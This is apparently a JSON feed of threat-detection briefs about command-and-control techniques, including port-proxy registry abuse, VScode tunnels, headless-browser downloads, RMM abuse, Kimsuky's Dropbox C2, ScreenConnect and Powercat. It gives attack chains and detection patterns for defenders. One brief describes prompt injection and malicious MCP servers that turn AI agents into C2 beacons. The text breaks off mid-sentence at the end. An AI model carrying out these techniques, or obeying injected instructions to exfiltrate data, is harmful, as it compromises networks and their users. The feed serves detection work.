{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/tags/command-and-control/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend","Sysmon Registry Events","Microsoft Defender XDR","SentinelOne Cloud Funnel"],"_cs_severities":["medium"],"_cs_tags":["port-forwarding","registry-modification","command-and-control","defense-evasion","windows"],"_cs_type":"advisory","_cs_vendors":["Elastic","Microsoft","SentinelOne","Crowdstrike"],"content_html":"\u003cp\u003eAttackers may configure port forwarding rules to bypass network segmentation restrictions, effectively using the compromised host as a jump box to access previously unreachable systems. This involves modifying the registry to redirect incoming TCP connections from a local port to another port or a remote computer. The technique is typically employed post-compromise to facilitate lateral movement and maintain unauthorized access within the network. This activity is detected by monitoring changes to the \u003ccode\u003eHKLM\\SYSTEM\\*ControlSet*\\Services\\PortProxy\\v4tov4\\\u003c/code\u003e registry subkeys.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker gains initial access to the target system through an exploit or compromised credentials.\u003c/li\u003e\n\u003cli\u003eThe attacker executes a command-line interface (e.g., \u003ccode\u003ecmd.exe\u003c/code\u003e or \u003ccode\u003epowershell.exe\u003c/code\u003e) with administrative privileges.\u003c/li\u003e\n\u003cli\u003eThe attacker uses \u003ccode\u003ereg.exe\u003c/code\u003e or PowerShell\u0026rsquo;s \u003ccode\u003eSet-ItemProperty\u003c/code\u003e cmdlet to modify the \u003ccode\u003eHKLM\\SYSTEM\\CurrentControlSet\\Services\\PortProxy\\v4tov4\\\u003c/code\u003e registry key.\u003c/li\u003e\n\u003cli\u003eThe attacker configures a new port forwarding rule by creating a new subkey under \u003ccode\u003ev4tov4\\\u003c/code\u003e with specific settings for the local port, remote address, and remote port.\u003c/li\u003e\n\u003cli\u003eThe attacker sets the \u003ccode\u003eListenAddress\u003c/code\u003e, \u003ccode\u003eListenPort\u003c/code\u003e, \u003ccode\u003eConnectAddress\u003c/code\u003e, and \u003ccode\u003eConnectPort\u003c/code\u003e values within the new subkey.\u003c/li\u003e\n\u003cli\u003eThe attacker verifies the successful creation and activation of the port forwarding rule using \u003ccode\u003enetsh interface portproxy show v4tov4\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the newly created port forwarding rule to tunnel traffic through the compromised host, bypassing network segmentation.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the proxied connection to access internal resources and conduct further attacks, such as lateral movement or data exfiltration.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation enables attackers to bypass network segmentation restrictions, leading to unauthorized access to internal systems and data. This can facilitate lateral movement, data exfiltration, and further compromise of the network. The severity of the impact depends on the sensitivity of the accessible resources and the extent of the attacker\u0026rsquo;s lateral movement.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable Sysmon registry event logging to capture modifications to the \u003ccode\u003eHKLM\\SYSTEM\\*ControlSet*\\Services\\PortProxy\\v4tov4\\\u003c/code\u003e registry subkeys, enabling detection of malicious port forwarding rule additions.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Port Forwarding Rule Addition via Registry Modification\u0026rdquo; to your SIEM to detect suspicious registry modifications related to port forwarding.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule, focusing on identifying the process execution chain and the user account that performed the action.\u003c/li\u003e\n\u003cli\u003eRegularly review and audit existing port forwarding rules to identify and remove any unauthorized or suspicious configurations.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-04T14:17:05Z","date_published":"2026-05-04T14:17:05Z","id":"/briefs/2026-05-port-forwarding-registry/","summary":"An adversary may abuse port forwarding to bypass network segmentation restrictions by creating a new port forwarding rule through modification of the Windows registry.","title":"Windows Port Forwarding Rule Addition via Registry Modification","url":"https://feed.craftedsignal.io/briefs/2026-05-port-forwarding-registry/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Microsoft Defender XDR","Elastic Defend","Sysmon","Visual Studio Code"],"_cs_severities":["medium"],"_cs_tags":["command-and-control","vscode","remote-access-tools","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft","GitHub","Elastic"],"content_html":"\u003cp\u003eThis detection focuses on identifying the misuse of Visual Studio Code\u0026rsquo;s (VScode) remote tunnel feature to establish unauthorized access or control over systems. While the VScode remote tunnel feature is designed to allow developers to connect to remote environments seamlessly, attackers can abuse this functionality for malicious purposes. The rule specifically looks for the execution of the VScode portable binary with the \u0026ldquo;tunnel\u0026rdquo; command-line option, which is indicative of an attempt to establish a remote tunnel session to either GitHub or a remote VScode instance. Successful exploitation can lead to command and control capabilities, allowing attackers to remotely manage and compromise the affected system. The rule aims to detect this suspicious behavior by monitoring process execution and command-line arguments.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker gains initial access to the target system through unspecified means.\u003c/li\u003e\n\u003cli\u003eThe attacker downloads a portable version of Visual Studio Code (VScode) onto the compromised system.\u003c/li\u003e\n\u003cli\u003eThe attacker executes the VScode binary with the \u003ccode\u003etunnel\u003c/code\u003e command-line argument to initiate a remote tunnel session.\u003c/li\u003e\n\u003cli\u003eThe attacker specifies additional arguments such as \u003ccode\u003e--accept-server-license-terms\u003c/code\u003e to bypass license agreement prompts.\u003c/li\u003e\n\u003cli\u003eThe VScode tunnel attempts to establish a connection to a remote server, potentially a GitHub repository or a remote VScode instance controlled by the attacker.\u003c/li\u003e\n\u003cli\u003eIf successful, the tunnel creates a persistent connection, allowing the attacker to execute commands and transfer files.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the established tunnel to remotely access the compromised system, enabling them to perform malicious activities such as data exfiltration or lateral movement.\u003c/li\u003e\n\u003cli\u003eThe attacker maintains persistent access through the established tunnel, allowing for long-term command and control of the compromised system.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows attackers to establish a persistent command and control channel, enabling them to remotely manage the compromised system. This can lead to data theft, deployment of ransomware, or further lateral movement within the network. While the number of potential victims and specific sectors targeted are not explicitly stated, the widespread use of VScode makes a wide range of organizations vulnerable.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the \u0026ldquo;Attempt to Establish VScode Remote Tunnel\u0026rdquo; rule to detect suspicious VScode tunnel activity in your environment.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process-creation logging to capture the necessary process execution data.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts triggered by the rule, focusing on the command-line arguments and process behaviors to confirm malicious intent.\u003c/li\u003e\n\u003cli\u003eMonitor network connections originating from VScode processes for unusual or unauthorized connections to external servers.\u003c/li\u003e\n\u003cli\u003eReview and whitelist legitimate uses of VScode\u0026rsquo;s tunnel feature by authorized developers to reduce false positives.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-04T14:17:05Z","date_published":"2026-05-04T14:17:05Z","id":"/briefs/2024-09-vscode-tunnel/","summary":"The rule detects the execution of the VScode portable binary with the tunnel command line option, potentially indicating an attempt to establish a remote tunnel session to Github or a remote VScode instance for unauthorized access and command and control.","title":"Detection of VScode Remote Tunneling for Command and Control","url":"https://feed.craftedsignal.io/briefs/2024-09-vscode-tunnel/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["command-and-control","headless-browser","file-download","windows"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eThis detection identifies potential file downloads via headless browsers on Windows systems. Attackers abuse headless browser capabilities (chrome.exe, msedge.exe, brave.exe, browser.exe, dragon.exe, vivaldi.exe) to download files, proxy traffic, and bypass application control policies. The technique leverages trusted, signed binaries to evade security restrictions, effectively using the browser as a covert download tool. The activity is characterized by a headless browser being launched from a suspicious parent process, such as a script host, Office application, or command shell, with arguments that facilitate scripted content retrieval like \u003ccode\u003e--headless*\u003c/code\u003e, \u003ccode\u003e--dump-dom\u003c/code\u003e, \u003ccode\u003e*http*\u003c/code\u003e, and \u003ccode\u003edata:text/html;base64,*\u003c/code\u003e. Defenders should monitor for such anomalous browser behavior to identify and prevent malicious file downloads.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eA user unknowingly executes a malicious script or document (e.g., via phishing or drive-by download).\u003c/li\u003e\n\u003cli\u003eThe script (e.g., PowerShell, VBScript) or document macro initiates a process, such as cmd.exe or powershell.exe.\u003c/li\u003e\n\u003cli\u003eThe parent process spawns a headless browser instance (chrome.exe, msedge.exe, etc.) with the \u003ccode\u003e--headless\u003c/code\u003e argument.\u003c/li\u003e\n\u003cli\u003eAdditional arguments are passed to the headless browser to specify a URL for download or base64 encoded content (\u003ccode\u003e--dump-dom *http*\u003c/code\u003e, \u003ccode\u003edata:text/html;base64,*\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eThe headless browser retrieves the content from the specified URL or decodes the base64 data.\u003c/li\u003e\n\u003cli\u003eThe browser saves the downloaded content to disk, often in a user-writable directory.\u003c/li\u003e\n\u003cli\u003eThe initial script or document executes the downloaded file or uses it for further malicious activities.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their objective, such as establishing persistence, exfiltrating data, or deploying ransomware.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to arbitrary code execution, data compromise, and system compromise. Attackers can use this technique to download malware, bypass security controls, and establish a foothold in the compromised system. The impact can range from individual workstation compromise to large-scale network infiltration, depending on the attacker\u0026rsquo;s objectives and the privileges of the compromised user.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rules in this brief to your SIEM to detect suspicious headless browser activity, tuning for your environment.\u003c/li\u003e\n\u003cli\u003eEnable process creation logging and command-line auditing to capture the necessary data for the Sigma rules.\u003c/li\u003e\n\u003cli\u003eInvestigate alerts generated by the Sigma rules, focusing on the parent process, browser arguments, and downloaded file artifacts.\u003c/li\u003e\n\u003cli\u003eReview and harden application control policies to restrict the execution of headless browsers from suspicious parent processes.\u003c/li\u003e\n\u003cli\u003eMonitor network connections from headless browsers to identify potential command and control traffic or data exfiltration attempts.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-06T15:34:19Z","date_published":"2026-04-06T15:34:19Z","id":"/briefs/2026-06-headless-browser-download/","summary":"Detects the execution of headless browsers from suspicious parent processes with arguments indicative of scripted retrieval, bypassing application control policies and restrictions on direct download tools.","title":"Potential File Download via a Headless Browser","url":"https://feed.craftedsignal.io/briefs/2026-06-headless-browser-download/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["medium"],"_cs_tags":["rmm","command-and-control","windows"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eThis brief focuses on the abuse of legitimate Remote Monitoring and Management (RMM) software by threat actors. RMM tools are often used for legitimate IT administration but can be leveraged for malicious purposes such as command and control, persistence, and lateral movement within a compromised network. This activity is identified by detecting DNS queries to a list of known RMM service domains originating from processes that are not typical web browsers. This behavior indicates that an RMM client, script, or other non-browser application is attempting to communicate with an RMM service. The detection rule was published on 2026-03-23 by Elastic and aims to surface unauthorized or malicious use of RMM tools within an organization. It is crucial to differentiate between legitimate and malicious RMM usage by analyzing the context of these DNS queries.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a Windows system through an unknown method.\u003c/li\u003e\n\u003cli\u003eThe attacker installs or deploys a legitimate RMM tool or a modified version.\u003c/li\u003e\n\u003cli\u003eThe RMM agent is configured to communicate with the attacker\u0026rsquo;s command and control infrastructure.\u003c/li\u003e\n\u003cli\u003eA non-browser process (e.g., a script or a standalone executable) initiates a DNS query to resolve an RMM domain (e.g., teamviewer.com, anydesk.com).\u003c/li\u003e\n\u003cli\u003eThe DNS query is resolved, establishing a network connection between the compromised system and the RMM service or attacker-controlled server.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the RMM tool to execute commands, transfer files, and maintain persistent access to the compromised system.\u003c/li\u003e\n\u003cli\u003eThe attacker performs lateral movement to other systems within the network, utilizing the RMM tool for remote administration.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their objective, such as data exfiltration or ransomware deployment, using the established RMM connection.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eCompromise via RMM tools can lead to significant damage, including unauthorized access to sensitive data, disruption of business operations, and potential ransomware attacks. Successful exploitation allows attackers to maintain persistent access and control over affected systems, facilitating lateral movement and further malicious activities. The widespread use of RMM tools in various sectors makes this a broad threat. The impact can range from a single compromised workstation to the complete takeover of an organization\u0026rsquo;s IT infrastructure.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the provided Sigma rule to your SIEM to detect DNS queries to RMM domains from non-browser processes and tune for your environment.\u003c/li\u003e\n\u003cli\u003eReview the IOC list of RMM domains and block any unauthorized RMM services at your DNS resolver.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule by examining the process tree and verifying the legitimacy of the process initiating the DNS query.\u003c/li\u003e\n\u003cli\u003eImplement application control policies to restrict the execution of unauthorized RMM tools on your endpoints.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon DNS event logging to activate the rules above.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-24T12:00:00Z","date_published":"2026-03-24T12:00:00Z","id":"/briefs/2026-03-rmm-domain-dns/","summary":"Detection of DNS queries to known remote monitoring and management (RMM) domains originating from non-browser processes on Windows systems indicates potential abuse of legitimate software for command and control.","title":"DNS Queries to RMM Domains from Non-Browser Processes","url":"https://feed.craftedsignal.io/briefs/2026-03-rmm-domain-dns/"},{"_cs_actors":["Kimsuky","Black Banshee","Velvet Chollima","Emerald Sleet","Thallium"],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["kimsuky","dropbox","api","command-and-control","exfiltration"],"_cs_type":"threat","_cs_vendors":[],"content_html":"\u003cp\u003eKimsuky, a North Korean APT group, has been observed utilizing malware that leverages the Dropbox API for command and control (C2). This allows the malware to blend in with legitimate network traffic, making detection more challenging. The malware uses the Dropbox API to upload stolen data and download commands from the attackers. This method provides a covert channel for exfiltration and control, bypassing traditional network-based security measures. The group has been known to target South Korean entities, but the scope of targeting may extend beyond this region. This technique has been observed starting in early 2026.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eInitial access is gained through an unconfirmed vector, such as spear phishing or watering hole attacks, delivering an initial downloader.\u003c/li\u003e\n\u003cli\u003eThe downloader executes and establishes persistence, potentially by creating scheduled tasks or modifying registry keys.\u003c/li\u003e\n\u003cli\u003eThe malware initializes the Dropbox API, authenticating with stolen or embedded API keys.\u003c/li\u003e\n\u003cli\u003eThe malware enumerates files on the compromised system, targeting documents, credentials, and other sensitive data.\u003c/li\u003e\n\u003cli\u003eStolen data is compressed and encrypted before being uploaded to a designated Dropbox folder controlled by the attacker, using the Dropbox API.\u003c/li\u003e\n\u003cli\u003eThe malware periodically checks the attacker\u0026rsquo;s Dropbox folder for new commands, also using the Dropbox API.\u003c/li\u003e\n\u003cli\u003eDownloaded commands are decrypted and executed on the compromised system, enabling actions such as remote code execution or further data exfiltration.\u003c/li\u003e\n\u003cli\u003eThe cycle of data exfiltration and command execution continues, allowing the attacker to maintain persistent access and control over the compromised system.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful attacks can lead to significant data breaches, intellectual property theft, and espionage. Kimsuky\u0026rsquo;s targeting of South Korean entities suggests a focus on political and strategic intelligence gathering. The use of Dropbox as a C2 channel allows the attackers to remain undetected for extended periods, maximizing the impact of the compromise. The number of victims is currently unknown, but the potential for widespread compromise is high.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor network traffic for unusual API calls to Dropbox, especially from unknown or suspicious processes (see: \u0026ldquo;Detect Suspicious Dropbox API Usage\u0026rdquo; Sigma rule).\u003c/li\u003e\n\u003cli\u003eImplement strict access controls and monitoring for Dropbox API usage within the organization.\u003c/li\u003e\n\u003cli\u003eInvestigate and block any suspicious processes attempting to access Dropbox API endpoints.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rules in this brief to your SIEM and tune for your environment.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-19T12:00:00Z","date_published":"2026-03-19T12:00:00Z","id":"/briefs/2026-03-kimsuky-dropbox-api/","summary":"Kimsuky is using malware that leverages the Dropbox API for command and control, enabling file exfiltration and remote code execution.","title":"Kimsuky Malware Using Dropbox API for Command and Control","url":"https://feed.craftedsignal.io/briefs/2026-03-kimsuky-dropbox-api/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Windows"],"_cs_severities":["medium"],"_cs_tags":["command-and-control","execution","lateral-movement","powershell"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003ePowercat is a PowerShell script that functions similarly to the traditional Netcat utility, allowing for network communication using TCP and UDP. Attackers can use Powercat to establish reverse shells, transfer files, and perform port scanning within a compromised environment. This activity is often employed during post-exploitation phases to maintain access and propagate further into the network. Defenders should be aware of PowerShell scripts invoking Powercat, especially in environments…\u003c/p\u003e\n","date_modified":"2024-11-04T14:27:00Z","date_published":"2024-11-04T14:27:00Z","id":"/briefs/2024-11-powercat-detection/","summary":"Adversaries may leverage Powercat, a PowerShell implementation of Netcat, to establish command and control channels or perform lateral movement within a compromised network.","title":"Powercat PowerShell Implementation Detection","url":"https://feed.craftedsignal.io/briefs/2024-11-powercat-detection/"},{"_cs_actors":[],"_cs_cves":[{"cvss":10,"id":"CVE-2024-1709"},{"cvss":8.4,"id":"CVE-2024-1708"}],"_cs_exploited":false,"_cs_products":["Elastic Defend","Microsoft Defender XDR","SentinelOne Cloud Funnel","ScreenConnect"],"_cs_severities":["medium"],"_cs_tags":["command-and-control","defense-evasion","execution","persistence","screenconnect"],"_cs_type":"advisory","_cs_vendors":["Elastic"],"content_html":"\u003cp\u003eThis threat brief focuses on the detection of suspicious activities related to the ScreenConnect remote access tool. ScreenConnect is a legitimate remote support software, but adversaries can exploit it to execute unauthorized commands on compromised systems. This detection identifies suspicious child processes spawned by ScreenConnect client processes, such as \u003ccode\u003eScreenConnect.ClientService.exe\u003c/code\u003e or \u003ccode\u003eScreenConnect.WindowsClient.exe\u003c/code\u003e, which can indicate malicious activities such as spawning PowerShell or cmd.exe with unusual arguments. This activity can indicate potential abuse of remote access capabilities, leading to data exfiltration, command and control communication, or the establishment of persistence mechanisms. Recent exploitation of CVE-2024-1709 and CVE-2024-1708 have highlighted the risk associated with ScreenConnect exploitation.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker gains unauthorized access to a system with ScreenConnect installed. This could be achieved through exploiting vulnerabilities like CVE-2024-1709 and CVE-2024-1708, or through credential compromise.\u003c/li\u003e\n\u003cli\u003eThe attacker uses ScreenConnect to connect to the compromised system remotely.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the ScreenConnect interface to execute commands on the remote system.\u003c/li\u003e\n\u003cli\u003eThe attacker spawns a command interpreter, such as \u003ccode\u003ecmd.exe\u003c/code\u003e, using ScreenConnect. This process is a child process of the ScreenConnect client process.\u003c/li\u003e\n\u003cli\u003eThe attacker uses \u003ccode\u003ecmd.exe\u003c/code\u003e to execute malicious commands, such as downloading and executing a malicious payload.\u003c/li\u003e\n\u003cli\u003eAlternatively, the attacker spawns \u003ccode\u003epowershell.exe\u003c/code\u003e with encoded commands or commands to download and execute malicious payloads from a remote server.\u003c/li\u003e\n\u003cli\u003eThe attacker establishes persistence by creating a scheduled task using \u003ccode\u003eschtasks.exe\u003c/code\u003e or creates a new service using \u003ccode\u003esc.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker uses tools like \u003ccode\u003enet.exe\u003c/code\u003e to modify user accounts or privileges to maintain access to the compromised system.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to unauthorized access to sensitive data, installation of malware, and establishment of persistent access to the compromised system. This can result in data theft, disruption of services, and further lateral movement within the network. The number of victims and specific sectors targeted varies depending on the attacker\u0026rsquo;s objectives, but the impact can be significant for organizations relying on ScreenConnect for remote support.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rules provided in this brief to your SIEM to detect suspicious child processes spawned by ScreenConnect and tune for your environment.\u003c/li\u003e\n\u003cli\u003eMonitor process creation events for ScreenConnect client processes spawning suspicious child processes like \u003ccode\u003epowershell.exe\u003c/code\u003e, \u003ccode\u003ecmd.exe\u003c/code\u003e, \u003ccode\u003enet.exe\u003c/code\u003e, \u003ccode\u003eschtasks.exe\u003c/code\u003e, \u003ccode\u003esc.exe\u003c/code\u003e, \u003ccode\u003erundll32.exe\u003c/code\u003e, \u003ccode\u003emshta.exe\u003c/code\u003e, \u003ccode\u003ecertutil.exe\u003c/code\u003e, \u003ccode\u003ewscript.exe\u003c/code\u003e, \u003ccode\u003ecscript.exe\u003c/code\u003e, \u003ccode\u003ecurl.exe\u003c/code\u003e, \u003ccode\u003essh.exe\u003c/code\u003e, \u003ccode\u003escp.exe\u003c/code\u003e, \u003ccode\u003ewevtutil.exe\u003c/code\u003e, \u003ccode\u003ewget.exe\u003c/code\u003e, or \u003ccode\u003ewmic.exe\u003c/code\u003e as detailed in the Sigma rules.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process-creation logging to capture the necessary process execution data to activate the rules above.\u003c/li\u003e\n\u003cli\u003eReview and revoke any unauthorized user accounts or privileges that may have been created or modified using tools like \u003ccode\u003enet.exe\u003c/code\u003e as described in the attack chain.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-05-16T16:10:00Z","date_published":"2024-05-16T16:10:00Z","id":"/briefs/2024-05-screenconnect-child-process/","summary":"This rule identifies suspicious child processes spawned by ScreenConnect client processes, potentially indicating unauthorized access and command execution abusing ScreenConnect remote access software to perform malicious activities such as data exfiltration or establishing persistence.","title":"Suspicious ScreenConnect Client Child Process Activity","url":"https://feed.craftedsignal.io/briefs/2024-05-screenconnect-child-process/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Copilot","Cursor","GPT4All","Jan","LM Studio","Ollama","Windsurf","bunx","codex","claude","deno","gemini-cli","genaiscript","grok","koboldcpp","llama-cli","llama-server","npx","pnpm","qwen","textgen","yarn","Confluence Data Center"],"_cs_severities":["medium"],"_cs_tags":["genai","command and control","macos","network connection"],"_cs_type":"advisory","_cs_vendors":["Elastic","Microsoft","Atlassian","GitHub"],"content_html":"\u003cp\u003eThis threat brief addresses the risk of GenAI tools on macOS connecting to unusual domains, which may indicate a compromised state. Attackers can exploit GenAI tools through prompt injection, malicious MCP (Model Context Protocol) servers, or poisoned plugins to establish command-and-control (C2) channels or exfiltrate sensitive data. Given the network access capabilities of AI agents, adversaries may manipulate them to beacon to external servers, download malicious payloads, or transmit harvested credentials and documents. The Elastic detection rule \u003ccode\u003e9050506c-df6d-4bdf-bc82-fcad0ef1e8c1\u003c/code\u003e focuses on identifying such anomalous network connections originating from a predefined list of GenAI processes, excluding known legitimate domains. The rule has been actively maintained since its creation on December 4, 2025, with its latest update on April 29, 2026.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAdversary compromises a GenAI tool on a macOS system through prompt injection, malicious MCP servers, or poisoned plugins.\u003c/li\u003e\n\u003cli\u003eThe compromised GenAI tool is configured to connect to an attacker-controlled domain for C2.\u003c/li\u003e\n\u003cli\u003eThe GenAI process initiates a network connection attempt to the unusual domain using standard web protocols (HTTP/HTTPS).\u003c/li\u003e\n\u003cli\u003eThe macOS system\u0026rsquo;s network stack resolves the attacker\u0026rsquo;s domain to its corresponding IP address.\u003c/li\u003e\n\u003cli\u003eThe GenAI process sends data to the attacker-controlled domain, potentially including sensitive information.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the C2 channel to send commands to the compromised GenAI tool.\u003c/li\u003e\n\u003cli\u003eThe GenAI tool executes the commands, potentially leading to further compromise or data exfiltration.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eCompromised GenAI tools can lead to data exfiltration, unauthorized access to sensitive information, and the establishment of persistent C2 channels within an organization\u0026rsquo;s network. The impact ranges from the loss of intellectual property and customer data to the potential disruption of business operations. The risk is amplified if the GenAI tool has access to internal systems or sensitive data stores, allowing attackers to pivot and escalate their attacks.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;GenAI Process Connecting to Unusual Domain\u0026rdquo; to your SIEM and tune for your environment (see rule below).\u003c/li\u003e\n\u003cli\u003eEnable process creation and network connection logging on macOS endpoints to collect the data required for the Sigma rule.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule to determine the legitimacy of the domain and the GenAI process\u0026rsquo;s behavior.\u003c/li\u003e\n\u003cli\u003eBlock any identified malicious domains at the network level (see query in the provided source).\u003c/li\u003e\n\u003cli\u003eReview the GenAI tool\u0026rsquo;s configuration for unauthorized MCP servers, plugins, or extensions that initiated the connection.\u003c/li\u003e\n\u003cli\u003eRegularly update the list of allowed domains in the Sigma rule\u0026rsquo;s filter to account for legitimate updates to GenAI tool infrastructure.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-05-02T14:22:30Z","date_published":"2024-05-02T14:22:30Z","id":"/briefs/2024-05-genai-unusual-domain/","summary":"This rule detects GenAI tools on macOS connecting to unusual domains, potentially indicating command and control activity, data exfiltration, or malicious payload retrieval following compromise via prompt injection, malicious MCP servers, or poisoned plugins.","title":"GenAI Process Connection to Unusual Domain on macOS","url":"https://feed.craftedsignal.io/briefs/2024-05-genai-unusual-domain/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend","SentinelOne Cloud Funnel"],"_cs_severities":["low"],"_cs_tags":["defense-evasion","command-and-control","windows","msxsl"],"_cs_type":"advisory","_cs_vendors":["Elastic","SentinelOne"],"content_html":"\u003cp\u003eMsXsl.exe is a Windows utility designed to transform XML data using XSLT stylesheets. Adversaries are known to abuse this utility to execute malicious scripts, bypassing application control and other security measures. This behavior is often used as a defense evasion technique to download or execute malicious payloads. This activity has been observed since at least March 2020. The abuse of msxsl.exe allows attackers to establish command and control or exfiltrate sensitive data without being easily detected, as the tool is a signed Microsoft binary. This matters for defenders because it highlights the need to monitor legitimate system utilities for anomalous behavior, specifically network connections to external IP addresses.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a Windows system through unspecified means.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages msxsl.exe to execute a malicious script.\u003c/li\u003e\n\u003cli\u003eMsxsl.exe initiates a network connection to an external IP address.\u003c/li\u003e\n\u003cli\u003eThe script downloads a malicious payload from the external server.\u003c/li\u003e\n\u003cli\u003eThe downloaded payload is executed on the compromised system.\u003c/li\u003e\n\u003cli\u003eThe attacker establishes a command and control channel through the network connection.\u003c/li\u003e\n\u003cli\u003eThe attacker performs data exfiltration via the established C2 channel.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eCompromised systems can be used for further malicious activities, including data theft, lateral movement, and deployment of additional malware. Successful exploitation can lead to sensitive data exfiltration, disruption of services, or complete system compromise. The low risk score does not represent impact, but instead reflects that the behavior is not always malicious, and may be a feature of normal software operation.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable Sysmon network connection logging to monitor msxsl.exe network activity.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Network Connection via MsXsl\u0026rdquo; to your SIEM and tune for your environment to detect suspicious network connections originating from msxsl.exe.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule, focusing on the destination IP address and the parent process of 